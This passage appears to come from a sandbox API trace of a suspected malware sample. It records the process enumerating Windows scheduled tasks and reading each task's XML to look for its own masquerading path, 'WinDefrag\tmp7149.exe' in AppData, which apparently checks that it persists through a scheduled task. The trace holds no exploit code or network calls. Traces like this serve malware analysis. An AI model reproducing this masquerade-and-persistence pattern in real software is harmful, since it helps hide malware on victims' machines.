\r\n 3\r\n \r\n \r\n \r\n \r\n true\r\n \r\n PT45M\r\n 1\r\n \r\n IgnoreNew\r\n true\r\n true\r\n false\r\n true\r\n false\r\n true\r\n true\r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {c27f6b1d-fe0b-45e4-9257-38799fa69bc8}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.502] IUnknown:Release (This=0x3282b0) returned 0x0 [0169.502] IUnknown:Release (This=0x328120) returned 0x0 [0169.502] ITaskFolder:GetFolders (in: This=0x328050, flags=0, ppFolders=0x18e228 | out: ppFolders=0x18e228*=0x328120) returned 0x0 [0169.503] ITaskFolderCollection:get_Count (in: This=0x328120, pCount=0x18e3a8 | out: pCount=0x18e3a8*=0) returned 0x0 [0169.503] IUnknown:Release (This=0x328120) returned 0x0 [0169.503] TaskScheduler:IUnknown:Release (This=0x328050) returned 0x0 [0169.503] ITaskFolderCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x8, varVal2=0x0), ppFolder=0x18e3b0 | out: ppFolder=0x18e3b0*=0x328050) returned 0x0 [0169.504] ITaskFolder:GetTasks (in: This=0x328050, flags=1, ppTasks=0x18e240 | out: ppTasks=0x18e240*=0x3280e0) returned 0x0 [0169.505] IRegisteredTaskCollection:get_Count (in: This=0x3280e0, pCount=0x18e390 | out: pCount=0x18e390*=1) returned 0x0 [0169.505] IRegisteredTaskCollection:get_Item (in: This=0x3280e0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328230) returned 0x0 [0169.505] IRegisteredTask:get_Name (in: This=0x328230, pName=0x18e230 | out: pName=0x18e230*="ScheduledDefrag") returned 0x0 [0169.505] IRegisteredTask:get_Xml (in: This=0x328230, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n $(@%systemroot%\\system32\\defragsvc.dll,-800)\r\n $(@%systemroot%\\system32\\defragsvc.dll,-801)\r\n $(@%systemroot%\\system32\\defragsvc.dll,-802)\r\n Microsoft\\Windows\\Defrag\\ScheduledDefrag\r\n \r\n \r\n \r\n 2017-09-27T01:00:00\r\n false\r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n InteractiveToken\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n true\r\n false\r\n \r\n PT3M\r\n P7D\r\n true\r\n true\r\n \r\n true\r\n false\r\n false\r\n true\r\n false\r\n true\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n %windir%\\system32\\defrag.exe\r\n -c\r\n \r\n \r\n") returned 0x0 [0169.509] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\defragsvc.dll,-800)\r\n $(@%systemroot%\\system32\\defragsvc.dll,-801)\r\n $(@%systemroot%\\system32\\defragsvc.dll,-802)\r\n Microsoft\\Windows\\Defrag\\ScheduledDefrag\r\n \r\n \r\n \r\n 2017-09-27T01:00:00\r\n false\r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n InteractiveToken\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n true\r\n false\r\n \r\n PT3M\r\n P7D\r\n true\r\n true\r\n \r\n true\r\n false\r\n false\r\n true\r\n false\r\n true\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n %windir%\\system32\\defrag.exe\r\n -c\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.509] IUnknown:Release (This=0x328230) returned 0x0 [0169.509] IUnknown:Release (This=0x3280e0) returned 0x0 [0169.509] ITaskFolder:GetFolders (in: This=0x328050, flags=0, ppFolders=0x18e228 | out: ppFolders=0x18e228*=0x3280e0) returned 0x0 [0169.510] ITaskFolderCollection:get_Count (in: This=0x3280e0, pCount=0x18e3a8 | out: pCount=0x18e3a8*=0) returned 0x0 [0169.510] IUnknown:Release (This=0x3280e0) returned 0x0 [0169.510] TaskScheduler:IUnknown:Release (This=0x328050) returned 0x0 [0169.510] ITaskFolderCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x9, varVal2=0x0), ppFolder=0x18e3b0 | out: ppFolder=0x18e3b0*=0x328050) returned 0x0 [0169.510] ITaskFolder:GetTasks (in: This=0x328050, flags=1, ppTasks=0x18e240 | out: ppTasks=0x18e240*=0x3280f0) returned 0x0 [0169.512] IRegisteredTaskCollection:get_Count (in: This=0x3280f0, pCount=0x18e390 | out: pCount=0x18e390*=1) returned 0x0 [0169.512] IRegisteredTaskCollection:get_Item (in: This=0x3280f0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328240) returned 0x0 [0169.512] IRegisteredTask:get_Name (in: This=0x328240, pName=0x18e230 | out: pName=0x18e230*="Scheduled") returned 0x0 [0169.512] IRegisteredTask:get_Xml (in: This=0x328240, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n $(@%systemroot%\\system32\\sdiagschd.dll,-101)\r\n 1.0\r\n $(@%systemroot%\\system32\\sdiagschd.dll,-102)\r\n $(@%systemroot%\\system32\\sdiagschd.dll,-103)\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n \\Microsoft\\Windows\\Diagnosis\\Scheduled\r\n \r\n \r\n \r\n 2004-01-01T01:00:00\r\n true\r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-4\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT8H\r\n false\r\n false\r\n \r\n StopExisting\r\n true\r\n true\r\n false\r\n true\r\n false\r\n true\r\n true\r\n true\r\n true\r\n false\r\n 7\r\n true\r\n \r\n \r\n \r\n {c1f85ef8-bcc2-4606-bb39-70c523715eb3}\r\n \r\n \r\n") returned 0x0 [0169.515] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\sdiagschd.dll,-101)\r\n 1.0\r\n $(@%systemroot%\\system32\\sdiagschd.dll,-102)\r\n $(@%systemroot%\\system32\\sdiagschd.dll,-103)\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n \\Microsoft\\Windows\\Diagnosis\\Scheduled\r\n \r\n \r\n \r\n 2004-01-01T01:00:00\r\n true\r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-4\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT8H\r\n false\r\n false\r\n \r\n StopExisting\r\n true\r\n true\r\n false\r\n true\r\n false\r\n true\r\n true\r\n true\r\n true\r\n false\r\n 7\r\n true\r\n \r\n \r\n \r\n {c1f85ef8-bcc2-4606-bb39-70c523715eb3}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.515] IUnknown:Release (This=0x328240) returned 0x0 [0169.515] IUnknown:Release (This=0x3280f0) returned 0x0 [0169.515] ITaskFolder:GetFolders (in: This=0x328050, flags=0, ppFolders=0x18e228 | out: ppFolders=0x18e228*=0x3280f0) returned 0x0 [0169.516] ITaskFolderCollection:get_Count (in: This=0x3280f0, pCount=0x18e3a8 | out: pCount=0x18e3a8*=0) returned 0x0 [0169.516] IUnknown:Release (This=0x3280f0) returned 0x0 [0169.516] TaskScheduler:IUnknown:Release (This=0x328050) returned 0x0 [0169.516] ITaskFolderCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa, varVal2=0x0), ppFolder=0x18e3b0 | out: ppFolder=0x18e3b0*=0x328050) returned 0x0 [0169.516] ITaskFolder:GetTasks (in: This=0x328050, flags=1, ppTasks=0x18e240 | out: ppTasks=0x18e240*=0x3280f0) returned 0x0 [0169.520] IRegisteredTaskCollection:get_Count (in: This=0x3280f0, pCount=0x18e390 | out: pCount=0x18e390*=2) returned 0x0 [0169.520] IRegisteredTaskCollection:get_Item (in: This=0x3280f0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328250) returned 0x0 [0169.520] IRegisteredTask:get_Name (in: This=0x328250, pName=0x18e230 | out: pName=0x18e230*="Microsoft-Windows-DiskDiagnosticDataCollector") returned 0x0 [0169.520] IRegisteredTask:get_Xml (in: This=0x328250, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-101)\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-100)\r\n Microsoft\\Windows\\DiskDiagnostic\\Microsoft-Windows-DiskDiagnosticDataCollector\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)\r\n 1.0\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-119)\r\n \r\n \r\n true\r\n false\r\n true\r\n IgnoreNew\r\n true\r\n false\r\n true\r\n false\r\n \r\n false\r\n \r\n true\r\n true\r\n \r\n \r\n \r\n 2004-01-01T01:00:00\r\n \r\n \r\n \r\n \r\n 2\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n dfdts.dll,DfdGetDefaultPolicyAndSMART\r\n \r\n \r\n") returned 0x0 [0169.523] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-101)\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-100)\r\n Microsoft\\Windows\\DiskDiagnostic\\Microsoft-Windows-DiskDiagnosticDataCollector\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)\r\n 1.0\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-119)\r\n \r\n \r\n true\r\n false\r\n true\r\n IgnoreNew\r\n true\r\n false\r\n true\r\n false\r\n \r\n false\r\n \r\n true\r\n true\r\n \r\n \r\n \r\n 2004-01-01T01:00:00\r\n \r\n \r\n \r\n \r\n 2\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n dfdts.dll,DfdGetDefaultPolicyAndSMART\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.523] IUnknown:Release (This=0x328250) returned 0x0 [0169.523] IRegisteredTaskCollection:get_Item (in: This=0x3280f0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328250) returned 0x0 [0169.523] IRegisteredTask:get_Name (in: This=0x328250, pName=0x18e230 | out: pName=0x18e230*="Microsoft-Windows-DiskDiagnosticResolver") returned 0x0 [0169.523] IRegisteredTask:get_Xml (in: This=0x328250, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-101)\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-100)\r\n Microsoft\\Windows\\DiskDiagnostic\\Microsoft-Windows-DiskDiagnosticResolver\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)(A;;FR;;;BU)\r\n 1.0\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-118)\r\n \r\n \r\n true\r\n false\r\n Parallel\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\DFDWiz.exe\r\n \r\n \r\n") returned 0x0 [0169.526] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-101)\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-100)\r\n Microsoft\\Windows\\DiskDiagnostic\\Microsoft-Windows-DiskDiagnosticResolver\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)(A;;FR;;;BU)\r\n 1.0\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-118)\r\n \r\n \r\n true\r\n false\r\n Parallel\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\DFDWiz.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.526] IUnknown:Release (This=0x328250) returned 0x0 [0169.526] IUnknown:Release (This=0x3280f0) returned 0x0 [0169.526] ITaskFolder:GetFolders (in: This=0x328050, flags=0, ppFolders=0x18e228 | out: ppFolders=0x18e228*=0x3280f0) returned 0x0 [0169.527] ITaskFolderCollection:get_Count (in: This=0x3280f0, pCount=0x18e3a8 | out: pCount=0x18e3a8*=0) returned 0x0 [0169.527] IUnknown:Release (This=0x3280f0) returned 0x0 [0169.527] TaskScheduler:IUnknown:Release (This=0x328050) returned 0x0 [0169.527] ITaskFolderCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xb, varVal2=0x0), ppFolder=0x18e3b0 | out: ppFolder=0x18e3b0*=0x328050) returned 0x0 [0169.527] ITaskFolder:GetTasks (in: This=0x328050, flags=1, ppTasks=0x18e240 | out: ppTasks=0x18e240*=0x3280e0) returned 0x0 [0169.529] IRegisteredTaskCollection:get_Count (in: This=0x3280e0, pCount=0x18e390 | out: pCount=0x18e390*=1) returned 0x0 [0169.529] IRegisteredTaskCollection:get_Item (in: This=0x3280e0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328230) returned 0x0 [0169.529] IRegisteredTask:get_Name (in: This=0x328230, pName=0x18e230 | out: pName=0x18e230*="Notifications") returned 0x0 [0169.529] IRegisteredTask:get_Xml (in: This=0x328230, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n $(@%systemRoot%\\system32\\LocationNotifications.exe,-102)\r\n Microsoft\\Windows\\Location\\Notifications\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)\r\n 1.3\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"Application\"><Select Path=\"Application\">*[System[Provider[@Name='LocationNotifications'] and EventID=1]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n true\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n %windir%\\System32\\LocationNotifications.exe\r\n \r\n \r\n") returned 0x0 [0169.531] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemRoot%\\system32\\LocationNotifications.exe,-102)\r\n Microsoft\\Windows\\Location\\Notifications\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)\r\n 1.3\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"Application\"><Select Path=\"Application\">*[System[Provider[@Name='LocationNotifications'] and EventID=1]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n true\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n %windir%\\System32\\LocationNotifications.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.531] IUnknown:Release (This=0x328230) returned 0x0 [0169.531] IUnknown:Release (This=0x3280e0) returned 0x0 [0169.531] ITaskFolder:GetFolders (in: This=0x328050, flags=0, ppFolders=0x18e228 | out: ppFolders=0x18e228*=0x3280e0) returned 0x0 [0169.533] ITaskFolderCollection:get_Count (in: This=0x3280e0, pCount=0x18e3a8 | out: pCount=0x18e3a8*=0) returned 0x0 [0169.533] IUnknown:Release (This=0x3280e0) returned 0x0 [0169.533] TaskScheduler:IUnknown:Release (This=0x328050) returned 0x0 [0169.533] ITaskFolderCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc, varVal2=0x0), ppFolder=0x18e3b0 | out: ppFolder=0x18e3b0*=0x328050) returned 0x0 [0169.533] ITaskFolder:GetTasks (in: This=0x328050, flags=1, ppTasks=0x18e240 | out: ppTasks=0x18e240*=0x3280f0) returned 0x0 [0169.534] IRegisteredTaskCollection:get_Count (in: This=0x3280f0, pCount=0x18e390 | out: pCount=0x18e390*=1) returned 0x0 [0169.534] IRegisteredTaskCollection:get_Item (in: This=0x3280f0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328240) returned 0x0 [0169.534] IRegisteredTask:get_Name (in: This=0x328240, pName=0x18e230 | out: pName=0x18e230*="WinSAT") returned 0x0 [0169.534] IRegisteredTask:get_Xml (in: This=0x328240, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n 2008-02-25T19:15:00\r\n $(@%systemroot%\\system32\\winsatapi.dll,-112)\r\n $(@%systemroot%\\system32\\winsatapi.dll,-113)\r\n $(@%systemroot%\\system32\\winsatapi.dll,-114)\r\n Microsoft\\Windows\\Maintenance\\WinSAT\r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-32-544\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n A9A33436-678B-4c9c-A211-7CC38785E79D\r\n \r\n \r\n \r\n \r\n true\r\n \r\n true\r\n false\r\n true\r\n false\r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n PT0S\r\n true\r\n \r\n") returned 0x0 [0169.538] StrStrIW (lpFirst="\r\n\r\n \r\n 2008-02-25T19:15:00\r\n $(@%systemroot%\\system32\\winsatapi.dll,-112)\r\n $(@%systemroot%\\system32\\winsatapi.dll,-113)\r\n $(@%systemroot%\\system32\\winsatapi.dll,-114)\r\n Microsoft\\Windows\\Maintenance\\WinSAT\r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-32-544\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n A9A33436-678B-4c9c-A211-7CC38785E79D\r\n \r\n \r\n \r\n \r\n true\r\n \r\n true\r\n false\r\n true\r\n false\r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n PT0S\r\n true\r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.538] IUnknown:Release (This=0x328240) returned 0x0 [0169.538] IUnknown:Release (This=0x3280f0) returned 0x0 [0169.538] ITaskFolder:GetFolders (in: This=0x328050, flags=0, ppFolders=0x18e228 | out: ppFolders=0x18e228*=0x3280f0) returned 0x0 [0169.539] ITaskFolderCollection:get_Count (in: This=0x3280f0, pCount=0x18e3a8 | out: pCount=0x18e3a8*=0) returned 0x0 [0169.539] IUnknown:Release (This=0x3280f0) returned 0x0 [0169.539] TaskScheduler:IUnknown:Release (This=0x328050) returned 0x0 [0169.539] ITaskFolderCollection:get_Item (in: This=0x326bd0, index=0x18e400*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xd, varVal2=0x0), ppFolder=0x18e3b0 | out: ppFolder=0x18e3b0*=0x328050) returned 0x0 [0169.539] ITaskFolder:GetTasks (in: This=0x328050, flags=1, ppTasks=0x18e240 | out: ppTasks=0x18e240*=0x3280f0) returned 0x0 [0169.562] IRegisteredTaskCollection:get_Count (in: This=0x3280f0, pCount=0x18e390 | out: pCount=0x18e390*=21) returned 0x0 [0169.562] IRegisteredTaskCollection:get_Item (in: This=0x3280f0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328240) returned 0x0 [0169.562] IRegisteredTask:get_Name (in: This=0x328240, pName=0x18e230 | out: pName=0x18e230*="ActivateWindowsSearch") returned 0x0 [0169.562] IRegisteredTask:get_Xml (in: This=0x328240, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ActivateWindowsSearch\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-26)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoActivateWindowsSearch\r\n \r\n \r\n") returned 0x0 [0169.564] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ActivateWindowsSearch\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-26)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoActivateWindowsSearch\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.564] IUnknown:Release (This=0x328240) returned 0x0 [0169.564] IRegisteredTaskCollection:get_Item (in: This=0x3280f0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328240) returned 0x0 [0169.565] IRegisteredTask:get_Name (in: This=0x328240, pName=0x18e230 | out: pName=0x18e230*="ConfigureInternetTimeService") returned 0x0 [0169.565] IRegisteredTask:get_Xml (in: This=0x328240, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ConfigureInternetTimeService\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-23)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoConfigureInternetTimeService\r\n \r\n \r\n") returned 0x0 [0169.567] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ConfigureInternetTimeService\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-23)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoConfigureInternetTimeService\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.568] IUnknown:Release (This=0x328240) returned 0x0 [0169.568] IRegisteredTaskCollection:get_Item (in: This=0x3280f0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328240) returned 0x0 [0169.568] IRegisteredTask:get_Name (in: This=0x328240, pName=0x18e230 | out: pName=0x18e230*="DispatchRecoveryTasks") returned 0x0 [0169.568] IRegisteredTask:get_Xml (in: This=0x328240, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\DispatchRecoveryTasks\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-27)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;AU)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n true\r\n Parallel\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoRecoveryTasks $(Arg0)\r\n \r\n \r\n") returned 0x0 [0169.571] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\DispatchRecoveryTasks\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-27)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;AU)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n true\r\n Parallel\r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DoRecoveryTasks $(Arg0)\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.572] IUnknown:Release (This=0x328240) returned 0x0 [0169.572] IRegisteredTaskCollection:get_Item (in: This=0x3280f0, index=0x18e270*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), ppRegisteredTask=0x18e238 | out: ppRegisteredTask=0x18e238*=0x328240) returned 0x0 [0169.572] IRegisteredTask:get_Name (in: This=0x328240, pName=0x18e230 | out: pName=0x18e230*="ehDRMInit") returned 0x0 [0169.572] IRegisteredTask:get_Xml (in: This=0x328240, pXml=0x18e220 | out: pXml=0x18e220*="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ehDRMInit\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-12)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWSDWDWO;;;LS)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-19\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DRMInit\r\n \r\n \r\n") returned 0x0 [0169.575] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Media Center\\ehDRMInit\r\n 2005-08-30T13:30:00-08:00\r\n 1.0\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-12)\r\n $(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)\r\n D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWSDWDWO;;;LS)(A;;FXFR;;;NS)\r\n \r\n \r\n false\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n S-1-5-19\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\ehome\\ehPrivJob.exe\r\n /DRMInit\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0169.575] IUnknown:Release (This=0x328240) returned 0x0 [0169.575] 